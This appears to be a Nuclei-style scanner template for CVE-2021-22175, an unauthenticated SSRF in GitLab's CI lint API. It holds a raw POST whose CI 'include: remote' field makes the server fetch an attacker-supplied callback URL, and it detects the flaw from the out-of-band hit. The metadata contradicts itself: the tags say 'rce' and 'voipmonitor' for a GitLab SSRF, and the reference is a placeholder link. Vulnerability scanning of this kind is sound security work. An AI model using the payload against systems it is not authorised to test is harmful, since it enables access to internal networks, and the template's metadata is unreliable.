id: CVE-2021-22175

info:
  name: Gitlab SSRF
  author: osamahamad
  severity: high
  description: Unauthenticated SSRF on some versions when internal webhook requests enabled
  tags: cve,cve2021,rce,voipmonitor
  reference: https://notyet.com

requests:
  - raw:
      - |
        POST /api/v4/ci/lint HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Connection: close
        Content-Type: application/json
        Content-Length: 110

        { "include_merged_yaml": true, "content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml" }

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
